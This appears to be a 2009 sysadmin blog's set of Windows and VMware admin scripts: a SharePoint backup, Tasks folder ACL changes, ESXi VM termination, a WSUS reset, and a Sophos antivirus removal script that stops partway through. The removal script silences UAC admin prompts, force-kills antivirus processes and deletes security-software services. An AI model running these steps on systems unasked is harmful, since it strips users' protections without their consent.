REM Get BLAT.exe from a google search
REM Blat SMTP Mailer
REM *Set Variables*
set location=C:\backup
set blat=c:\windows\system32\blat.exe
set relayserver=mail.yourdomain.com
set yoursite=http://server
set emailsub=SharePointBackupReport
set templog=c:\spbackup.txt
set file=Backup.bak
set to=me@mydomain.com
set who=sharepointbackup@mydomain.com
set reply=noreply@mydomain.com
REM *Rename Old Backups and Drop Oldest*
del %location%\%file%.7day
rename %location%\%file%.6day %file%.7day
rename %location%\%file%.5day %file%.6day
rename %location%\%file%.4day %file%.5day
rename %location%\%file%.3day %file%.4day
rename %location%\%file%.2day %file%.3day
rename %location%\%file%.1day %file%.2day
rename %location%\%file% %file%.1day
REM *Lock Sharepoint as readonly, create backup, unlock*
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o setsitelock -url http://server -lock readonly
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o backup -overwrite -url %yoursite% -backupmethod full -filename %location%\%file% > %templog%
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN\Stsadm.exe" -o setsitelock -url http://server -lock none
dir %location% >> %templog%
Monday, November 9, 2009
Wednesday, July 15, 2009
Settings Permissions on the windows TASKS folder
Be VERY cautious when following these steps, or you may inadvertently open up serious security holes -- there IS a reason Microsoft locks this folder down!!
1. Open a command prompt.
2. Type XCOPY C:\WINDOWS\TASKS c:\TASKPERM /s /e /k /o
3. Go to Windows Explorer and modify the ACL of C:\TASKPERM to suit your needs. Remember that if the user/group you are assigning permissions to should not be able to modify ALL tasks, it is important to set the "Apply To" attribute to "This folder only."
4. Back at the command prompt, type CACLS C:\TASKPERM /S
Copy the SDDL string into notepad - you only need the info between the " " marks.
5. Type CACLS C:\WINDOWS\TASKS /S:... replacing/pasting the part with the SDDL string you put into notepad
6. Hey Presto!!
If you make a mistake The default ACL for Windows Server 2003 is D:P(A;OICIIO;FA;;;CO)(A;;0x1200ab;;;BO)(A;;0x1200ab;;;SO)(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)
1. Open a command prompt.
2. Type XCOPY C:\WINDOWS\TASKS c:\TASKPERM /s /e /k /o
3. Go to Windows Explorer and modify the ACL of C:\TASKPERM to suit your needs. Remember that if the user/group you are assigning permissions to should not be able to modify ALL tasks, it is important to set the "Apply To" attribute to "This folder only."
4. Back at the command prompt, type CACLS C:\TASKPERM /S
Copy the SDDL string into notepad - you only need the info between the " " marks.
5. Type CACLS C:\WINDOWS\TASKS /S:
6. Hey Presto!!
If you make a mistake The default ACL for Windows Server 2003 is D:P(A;OICIIO;FA;;;CO)(A;;0x1200ab;;;BO)(A;;0x1200ab;;;SO)(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)
Terminate VMHost from ESX Console
On the ESXi console, press Alt-F1.
Type the word unsupported (text will not be displayed while typing) and press Enter. A password prompt will appear. Enter the root password for the ESXi host and you will be at a # prompt in the root partition.
The process status (ps) command shows the currently-running processes on a server, and the grep command finds the specified text in the output of the ps command. Type ps -g | grep which will return the WID (first column), CID (second column) and process group ID (PGID) (fourth column) of the running processes of the VM. You will have several entries returned; the number in the fourth column of the entries is the PGID of the VM.
The kill command sends a signal to terminate a process using its ID number. The ‘-9′ parameter forces the process to quit immediately and cannot be ignored like the more graceful ‘-15′ parameter can sometimes be. Type kill -9 which will forcibly terminate the process for the specified VM.
You can check the state of the VM again by typing vm-support -x; you should no longer see the VM listed.
You can leave tech support mode by typing ‘exit’ and press Alt-F2 to return to the normal console mode.
All three of these methods work identically on ESXi hosts in both VMware Infrasture 3and vSphere.
Actual Commands
ps -g | grep %VMHOST_Name%
kill -9 %VMHost_ID%
vm-support -x
Type the word unsupported (text will not be displayed while typing) and press Enter. A password prompt will appear. Enter the root password for the ESXi host and you will be at a # prompt in the root partition.
The process status (ps) command shows the currently-running processes on a server, and the grep command finds the specified text in the output of the ps command. Type ps -g | grep
The kill command sends a signal to terminate a process using its ID number. The ‘-9′ parameter forces the process to quit immediately and cannot be ignored like the more graceful ‘-15′ parameter can sometimes be. Type kill -9
You can check the state of the VM again by typing vm-support -x; you should no longer see the VM listed.
You can leave tech support mode by typing ‘exit’ and press Alt-F2 to return to the normal console mode.
All three of these methods work identically on ESXi hosts in both VMware Infrasture 3and vSphere.
Actual Commands
ps -g | grep %VMHOST_Name%
kill -9 %VMHost_ID%
vm-support -x
Wednesday, July 8, 2009
RESET WSUS - Client machine
net stop wuauserv
regsvr32 /s wuapi.dll
regsvr32 /s wups.dll
regsvr32 /s wuaueng.dll
regsvr32 /s wucltui.dll
regsvr32 /s msxml3.dll
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate" /va /f
del /q /s c:\windows\softwaredistribution
net start wuauserv
wuauclt /resetauthorization /detectnow
regsvr32 /s wuapi.dll
regsvr32 /s wups.dll
regsvr32 /s wuaueng.dll
regsvr32 /s wucltui.dll
regsvr32 /s msxml3.dll
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v AccountDomainSid /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v PingID /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate" /va /f
del /q /s c:\windows\softwaredistribution
net start wuauserv
wuauclt /resetauthorization /detectnow
Sunday, July 5, 2009
Sophos Anti-Virus 4/5/6/7.x -- Removal Script V2.11
SC.zip and SUBINACL.exe required from Mircosoft.com to use this script.
SC.zip - ftp://ftp.microsoft.com/reskit/win2000/sc.zip
Subinacl.exe - http://www.microsoft.com/downloads/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b&displaylang=en
@ECHO OFF
ECHO ==================================================================
ECHO REMSAV-ALL-211.BAT
ECHO ------------------------------------------------------------------
ECHO Sophos Anti-Virus 4/5/6/7.x -- Removal Script V2.11
ECHO.
ECHO NOTE: Please make a full backup of the computer before you continue.
ECHO.
ECHO Do NOT run this script on computers with the following:-
ECHO -- Small Business Edition
ECHO -- Enterprise Console
ECHO -- EM Library
ECHO -- PureMessage
Echo.
ECHO Script intended for use on Windows 2000/XP/2003/Vista ONLY.
ECHO.
ECHO Press Ctrl-C to Cancel.
ECHO ==================================================================
ECHO.
Pause
CLS
ECHO Checking for 64-bit operating system...
if exist "%windir%\syswow64" (
Echo.
Echo ==========================================================
Echo We have detected that you are using this script
Echo on a 64-bit Operating System. For this script to
Echo run properly on this version of Windows, this
Echo script should be run in a 32-bit command prompt
Echo window. This can be done by running
Echo %windir%\syswow64\cmd.exe and then running the script again
Echo from that command prompt window.
Echo.
Echo Please exit this script if it is not being run in this
Echo manner by pressing CTRL+C.
Echo ==========================================================
Echo.
pause
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Anti-Rootkit" (
Echo.
Echo Sophos Anti-Rootkit found, aborting script.
Echo.
pause
Exit
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\Sophos Diagnostic Utility" (
Echo.
Echo Sophos Diagnostic Utility found, aborting script.
Echo.
pause
Exit
)
ECHO Checking Requirements...
if exist "%PROGRAMFILES%\Sophos\NAC" (
Echo.
Echo Sophos NAC found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\Enterprise Console" (
Echo.
Echo Sophos Enterprise Console found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\PureMessage" (
Echo.
Echo Sophos PureMessage found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos Enterprise Manager" (
Echo.
Echo Sophos EM Library found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\SCC" (
Echo.
Echo Sophos SBE found, aborting script.
Echo.
pause
Exit
)
if exist "%PROGRAMFILES%\Sophos\Sophos Client Firewall" (
Echo.
Echo Sophos Client Firewall found, aborting script.
Echo.
pause
Exit
)
ECHO Completed.
ECHO.
ECHO Checking for Microsoft Vista (1)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC mode to silent...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000000 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)
ECHO.
ECHO Killing Active Sophos Processes...
TASKKILL /F /IM "Almon.exe" >NUL 2>NUL
TASKKILL /F /IM "ICMON.exe" >NUL 2>NUL
Echo Completed.
ECHO.
ECHO Performing Regular Uninstall...
REM MSIEXEC /X {15C418EB-7675-42be-B2B3-281952DA014D} /qn 2>NUL
REM MSIEXEC /X {C12953C2-4F15-4A6C-91BC-511B96AE2775} /qn 2>NUL
REM MSIEXEC /X {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {034759DA-E21A-4795-BFB3-C66D17FAD183} REBOOT=SUPPRESS /qn 2>NUL
REM MSIEXEC /X {FF11005D-CBC8-45D5-A288-25C7BB304121} /qn 2>NUL
"%PROGRAMFILES%\Sophos Sweep for NT\Setup.exe" -ni -force -remove 2>NUL
ECHO Completed.
ECHO.
ECHO Performing MSI Cleanup On Sophos Components...
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {15C418EB-7675-42be-B2B3-281952DA014D} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {09C6BF52-6DBA-4A97-9939-B6C24E4738BF} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {C12953C2-4F15-4A6C-91BC-511B96AE2775} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {FF11005D-CBC8-45D5-A288-25C7BB304121} >NUL 2>NUL
"%PROGRAMFILES%\Windows Installer Clean Up\MSIZAP.EXE" tw {034759DA-E21A-4795-BFB3-C66D17FAD183} >NUL 2>NUL
Echo Completed.
ECHO.
ECHO Constructing Registry Keys For Removal...
ECHO Completed.
ECHO REGEDIT4 > %TEMP%\SOTMP.REG
ECHO. >> %TEMP%\SOTMP.REG
REM ====** Registry Keys marked for Removal **=====================================================================
REM === MSI Installer GUIDs ===
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_CLASSES_ROOT\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\E932B7952303A1943A2218777329E5A8] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\0D6888B32A8929940ACA98A3DEBB94B4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A2ECF5789F971654CBB5476964870E94] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\25FB6C90ABD679A499936B2CE47483FB] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\BE814C515767eb242B3B829125AD10D4] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2C35921C51F4C6A419CB15B169EA7257] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D50011FF8CBC5D542A88527CBB031412] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\AD957430A12E5974FB3B6CD671AF1D38] >> %TEMP%\SOTMP.REG
REM === Sophos Application Settings ===
ECHO [-HKEY_CURRENT_USER\Software\Sophos] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos] >> %TEMP%\SOTMP.REG
REM === Sophos Uninstall Keys ===
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{15C418EB-7675-42be-B2B3-281952DA014D}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C12953C2-4F15-4A6C-91BC-511B96AE2775}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FF11005D-CBC8-45D5-A288-25C7BB304121}] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{034759DA-E21A-4795-BFB3-C66D17FAD183}] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set01 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set02 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SAVSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_AGENT] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_AUTOUPDATE_SERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_SOPHOS_MESSAGE_ROUTER] >> %TEMP%\SOTMP.REG
REM === Sophos Event Log Registration Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\SophosAntiVirus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\Application\Sophos Anti-Virus] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Eventlog\System\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
REM === Sophos Services Set03 ===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVAdminService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccess] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SophosBootDriver] >> %TEMP%\SOTMP.REG
REM === Sophos Legacy Services Current===
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVADMINSERVICE] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_CONTROL] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAVONACCESS_FILTER] >> %TEMP%\SOTMP.REG
